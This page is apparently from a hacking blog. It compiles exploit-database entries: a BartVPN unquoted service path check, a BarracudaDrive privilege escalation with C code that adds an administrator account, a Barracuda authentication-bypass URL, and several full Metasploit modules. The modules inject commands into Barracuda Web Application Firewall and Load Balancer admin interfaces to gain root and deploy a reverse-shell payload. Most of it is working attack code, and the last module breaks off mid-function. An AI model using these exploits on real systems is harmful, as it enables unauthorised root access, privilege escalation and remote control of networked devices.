#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-11-18
#Vendor Homepage : https://www.filehorse.com/
#Link Software : https://www.filehorse.com/download-bartvpn/
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc BartVPNService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: BartVPNService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BartVPNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863118382
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# CVE ID: N/A
# Date: 2020-09-01
# Vendor Homepage: https://barracudaserver.com/
# Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html
# Version: v6.5
# Tested On: Windows 10 Pro
# CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0
# CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
# CWE-276: Incorrect Default Permissions
# CWE-732: Incorrect Permission Assignment for Critical Resource
# Vulnerability Description:
# Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5
# allows local low-privilege attacker to escalate privileges to admin via replacing the bd.exe
# file and restarting the computer where the malicious code will be executed as 'LocalSystem'
# on the next startup.
## Insecure Folder Permission
C:\>cacls C:\bd
C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
## Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>sc qc bd
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\bd\bd.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BarracudaDrive ( bd ) service
DEPENDENCIES : Tcpip
SERVICE_START_NAME : LocalSystem
## Local Privilege Escalation Proof of Concept
#0. Download & install
#1. Create low privileged user & change to the user
## As admin
C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None
#2. Move the Service EXE to a new name
C:\bd>whoami
desktop\lowpriv
C:\bd>move bd.exe bd.service.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user boku mypassword /add");
system("net localgroup Administrators boku /add");
WinExec("C:\\bd\\bd.service.exe",0);
return 0;
}
## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe
#4. Transfer created 'bd.exe' to the Windows Host
#5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder
C:\bd>move C:\Users\lowpriv\Downloads\bd.exe .
#6. Check that exploit admin user doesn't exit
C:\bd>net user boku
The user name could not be found
#6. Reboot the Computer
C:\bd>shutdown /r
#7. Login & look at that new Admin
C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full"
User name boku
Local Group Memberships *Administrators *Users
Global Group memberships *None
# Exploit Title: Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Remote Root Exploit
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webapplicationfirewall
# Version: Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: interface_stats
require 'msf/core'
require 'date'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Root Exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web
Application Firweall firmware versions <= v8.0.1.008 (2016-03-22) by exploiting a
vulnerability in the web administration interface. By sending a specially crafted
request it's possible to inject system commands while escalating to root do to relaxed
sudo configuration on the local machine.
},
'Author' => [ 'xort' ], # disclosure and exploit module
'References' => [ [ 'none', 'none'] ],
'Platform' => [ 'linux'],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Targets' => [['Web Application Firewall <= v8.0.1.008 (2016-03-22)', {}]],
'DefaultTarget' => 0 ))
register_options(
[
OptString.new('PASSWORD', [ false, 'Password', "admin" ]),
OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
# file to replace
sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
vprint_status( "Running Command...\n" )
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
# injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
},
'vars_get' => {
'ajax_action' => 'interface_stats',
'user' => username,
'password' => password,
'et' => et,
'locale' => 'en_US',
'realm' => '',
'auth_type' => 'Local',
'primary_tab' => 'BASIC',
'secondary_type' => 'status',
'interface' => 'eth0' + '| ' + injection_string + ' |echo ' # vuln
}
})
end
def exploit
# params
timeout = 1550;
real_user = "";
et = Time.now.to_i
user = datastore['USERNAME']
password = datastore['PASSWORD']
# do login and get password hash
password_hash, et = do_login(user, password, et)
vprint_status("got password hash: #{password_hash}\n")
sleep(2)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
source: https://www.securityfocus.com/bid/69028/info
Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: UPDATE_va_other_options trigger exploit
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web App Firewall
Firmware Version <= 8.0.1.008 and Load Balancer Firmware <= v5.4.0.004 by exploiting a vulnerability
in the web administration interface. By sending a specially crafted request it's possible to inject
system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.008 (2016-03-22)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
vprint_status(" file = " + b64dumpfile)
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "ADVANCE" ],
[ "realm","" ],
[ "secondary_tab","advanced_system" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "UPDATE_va_other_options", "1" ],
[ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ] # vuln
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = datastore['PASSWORD']
password = datastore['PASSWORD']
# et = datastore['ET']
end
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit
# Date: 07/21/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# CVE : None.
# vuln: ondefine_modify_admin_role trigger exploit
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
by exploiting a vulnerability in the web administration interface. By sending a specially crafted request
it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
sudo_cmd_exec = target.SudoCmdExec
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
injection_string = "printf \"#{encoded_cmd}\" > #{dumpfile} ; /bin/chmod +x #{dumpfile} ; #{sudo_run_cmd_1} ; #{sudo_run_cmd_2} #{dumpfile} ; rm #{dumpfile}"
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "BASIC" ],
[ "realm","" ],
[ "secondary_tab","reports" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "scope", "" ],
[ "scope_data", "; #{injection_string} ;" ], # vuln
[ "modify_admin_role", "" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
# if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)
# Date: 07/25/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
# CVE : None.
# This exploit combines 2 bugs to leverage root access
# Vuln 1: ondefined_view_template trigger - File upload vuln
# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',
'Description' => %q{
This module exploits a remote command execution vulnerability in
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File
Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean
up left-over core files on the device to execute them. By sending a specially crafted requests
it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to overwrite
cmd_file = "/home/product/code/config/corefile_list.txt"
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "BASIC" ],
[ "realm","" ],
[ "secondary_tab","reports" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "upload_template_file_filename", "admin" ]
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# upload file
up_filename = cmd_file
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"
post_data << ";#{injection_string};\r\n"
# end data
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
'Accept-Language' => "en-US,en;q=0.5"
}
})
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
# triger vuln
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"
post_data << "\r\n"
post_data << "--#{boundary}--\r\n" # end boundary
# upload file vuln
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
